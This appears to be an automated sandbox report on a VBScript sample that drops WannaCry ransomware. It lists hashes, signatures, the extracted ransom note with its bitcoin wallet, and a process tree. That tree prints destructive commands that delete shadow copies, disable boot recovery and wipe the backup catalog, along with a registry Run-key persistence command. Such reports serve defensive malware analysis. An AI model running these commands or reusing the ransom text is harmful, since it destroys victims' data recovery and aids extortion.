Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

test.vbs

windows7_x64

10

test.vbs

windows10_x64

10

Analysis

  • max time kernel
    146s
  • max time network
    133s
  • platform
    windows10_x64
  • resource
    win10v200430
  • submitted
    14/07/2020, 07:32

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    test.vbs

  • Size

    589B

  • MD5

    94d9611bf2c6e0caa430b1b0b808da1e

  • SHA1

    723de46bdda58dd345b0c0bfd8bdbc33ea1931ec

  • SHA256

    8cf91cb3c0524feabe3b9502aa36ec58003e9e0db849901948cd335caf0e4f66

  • SHA512

    6baddf54c364c1c39bccd4f3e78f2b97f62297382c46642f6fc921fb2bc950e3ee44c6f94b5447c13faa028d9bc706ee9784582188e7a07fd3805de836b63e8e

Score
10/10
ransomwarediscoveryspywarepersistencewormwannacry

Malware Config

Extracted

Path

C:\Users\Admin\AppData\Local\Temp\@[email protected]

Family

wannacry

Ransom Note
Q: What's wrong with my files? A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted. If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely! Let's start decrypting! Q: What do I do? A: First, you need to pay service fees for the decryption. Please send $300 worth of bitcoin to this bitcoin address: 13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94 Next, please find an application file named "@[email protected]". It is the decrypt software. Run and follow the instructions! (You may need to disable your antivirus for a while.) Q: How can I trust? A: Don't worry about decryption. We will decrypt your files surely because nobody will trust us if we cheat users. * If you need our assistance, send a message by clicking <Contact Us> on the decryptor window. �
Wallets

13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94

Signatures

  • Modifies service 2 TTPs 4 IoCs
    persistence
  • Executes dropped EXE 17 IoCs
  • Interacts with shadow copies 2 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

    ransomware
  • Modifies file permissions 1 TTPs 1 IoCs
    discovery
  • Drops startup file 2 IoCs
  • Suspicious use of WriteProcessMemory 81 IoCs
  • Suspicious use of SetWindowsHookEx 9 IoCs
  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

    ransomware
  • Views/modifies file attributes 1 TTPs 1 IoCs
    evasion
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spyware
  • Modifies registry key 1 TTPs 1 IoCs
  • Adds Run entry to start application 2 TTPs 2 IoCs
    persistence
  • Loads dropped DLL 8 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 53 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 2 IoCs
    ransomware
  • Wannacry

    WannaCry is a ransomware cryptoworm.

    ransomwarewormwannacry
  • Blacklisted process makes network request 1 IoCs
  • Deletes itself 1 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\test.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    • Blacklisted process makes network request
    • Deletes itself
    PID:3544
    • C:\Users\Admin\AppData\Local\Temp\important.exe
      "C:\Users\Admin\AppData\Local\Temp\important.exe"
      2⤵
      • Executes dropped EXE
      • Drops startup file
      • Suspicious use of WriteProcessMemory
      • Sets desktop wallpaper using registry
      PID:640
      • C:\Windows\SysWOW64\attrib.exe
        attrib +h .
        3⤵
        • Views/modifies file attributes
        PID:864
      • C:\Windows\SysWOW64\icacls.exe
        icacls . /grant Everyone:F /T /C /Q
        3⤵
        • Modifies file permissions
        PID:916
      • C:\Users\Admin\AppData\Local\Temp\taskdl.exe
        taskdl.exe
        3⤵
        • Executes dropped EXE
        PID:2088
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c 230491594719096.bat
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2448
        • C:\Windows\SysWOW64\cscript.exe
          cscript.exe //nologo m.vbs
          4⤵
            PID:2596
        • C:\Users\Admin\AppData\Local\Temp\@[email protected]
          @[email protected] co
          3⤵
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          • Suspicious use of SetWindowsHookEx
          PID:1148
          • C:\Users\Admin\AppData\Local\Temp\TaskData\Tor\taskhsvc.exe
            TaskData\Tor\taskhsvc.exe
            4⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious behavior: EnumeratesProcesses
            PID:2132
        • C:\Windows\SysWOW64\cmd.exe
          cmd.exe /c start /b @[email protected] vs
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:1204
          • C:\Users\Admin\AppData\Local\Temp\@[email protected]
            @[email protected] vs
            4⤵
            • Executes dropped EXE
            • Suspicious use of WriteProcessMemory
            • Suspicious use of SetWindowsHookEx
            PID:1732
            • C:\Windows\SysWOW64\cmd.exe
              cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:1036
              • C:\Windows\SysWOW64\vssadmin.exe
                vssadmin delete shadows /all /quiet
                6⤵
                • Interacts with shadow copies
                PID:4020
              • C:\Windows\SysWOW64\Wbem\WMIC.exe
                wmic shadowcopy delete
                6⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:3888
        • C:\Users\Admin\AppData\Local\Temp\taskse.exe
          taskse.exe C:\Users\Admin\AppData\Local\Temp\@[email protected]
          3⤵
          • Executes dropped EXE
          • Suspicious use of AdjustPrivilegeToken
          PID:3668
        • C:\Users\Admin\AppData\Local\Temp\@[email protected]
          @[email protected]
          3⤵
          • Executes dropped EXE
          • Suspicious use of SetWindowsHookEx
          • Sets desktop wallpaper using registry
          PID:3556
        • C:\Users\Admin\AppData\Local\Temp\taskdl.exe
          taskdl.exe
          3⤵
          • Executes dropped EXE
          PID:1448
        • C:\Windows\SysWOW64\cmd.exe
          cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "biiywaghgcpcp303" /t REG_SZ /d "\"C:\Users\Admin\AppData\Local\Temp\tasksche.exe\"" /f
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:3060
          • C:\Windows\SysWOW64\reg.exe
            reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "biiywaghgcpcp303" /t REG_SZ /d "\"C:\Users\Admin\AppData\Local\Temp\tasksche.exe\"" /f
            4⤵
            • Modifies registry key
            • Adds Run entry to start application
            PID:1740
        • C:\Users\Admin\AppData\Local\Temp\taskdl.exe
          taskdl.exe
          3⤵
          • Executes dropped EXE
          PID:3608
        • C:\Users\Admin\AppData\Local\Temp\taskse.exe
          taskse.exe C:\Users\Admin\AppData\Local\Temp\@[email protected]
          3⤵
          • Executes dropped EXE
          • Suspicious use of AdjustPrivilegeToken
          PID:3940
        • C:\Users\Admin\AppData\Local\Temp\taskdl.exe
          taskdl.exe
          3⤵
          • Executes dropped EXE
          PID:2088
        • C:\Users\Admin\AppData\Local\Temp\taskse.exe
          taskse.exe C:\Users\Admin\AppData\Local\Temp\@[email protected]
          3⤵
          • Executes dropped EXE
          • Suspicious use of AdjustPrivilegeToken
          PID:3812
        • C:\Users\Admin\AppData\Local\Temp\taskse.exe
          taskse.exe C:\Users\Admin\AppData\Local\Temp\@[email protected]
          3⤵
          • Executes dropped EXE
          • Suspicious use of AdjustPrivilegeToken
          PID:1668
        • C:\Users\Admin\AppData\Local\Temp\taskdl.exe
          taskdl.exe
          3⤵
          • Executes dropped EXE
          PID:816
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Modifies service
      • Suspicious use of AdjustPrivilegeToken
      PID:2768

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/640-46-0x0000000010000000-0x0000000010010000-memory.dmp

      Filesize

      64KB

      Download

    • memory/2132-407-0x0000000003160000-0x0000000003161000-memory.dmp

      Filesize

      4KB

      Download

    • memory/2132-527-0x0000000003770000-0x0000000003771000-memory.dmp

      Filesize

      4KB

      Download

    • memory/2132-410-0x0000000003F70000-0x0000000003F71000-memory.dmp

      Filesize

      4KB

      Download

    • memory/2132-579-0x0000000003770000-0x0000000003771000-memory.dmp

      Filesize

      4KB

      Download

    • memory/2132-411-0x0000000003770000-0x0000000003771000-memory.dmp

      Filesize

      4KB

      Download

    • memory/2132-243-0x0000000003160000-0x0000000003161000-memory.dmp

      Filesize

      4KB

      Download

    • memory/2132-79-0x0000000003160000-0x0000000003161000-memory.dmp

      Filesize

      4KB

      Download

    • memory/2132-244-0x0000000003960000-0x0000000003961000-memory.dmp

      Filesize

      4KB

      Download

    • memory/2132-80-0x0000000003960000-0x0000000003961000-memory.dmp

      Filesize

      4KB

      Download

    • memory/2132-245-0x0000000003160000-0x0000000003161000-memory.dmp

      Filesize

      4KB

      Download

    • memory/2132-316-0x0000000003160000-0x0000000003161000-memory.dmp

      Filesize

      4KB

      Download

    • memory/2132-81-0x0000000003160000-0x0000000003161000-memory.dmp

      Filesize

      4KB

      Download

    • memory/2132-409-0x0000000003770000-0x0000000003771000-memory.dmp

      Filesize

      4KB

      Download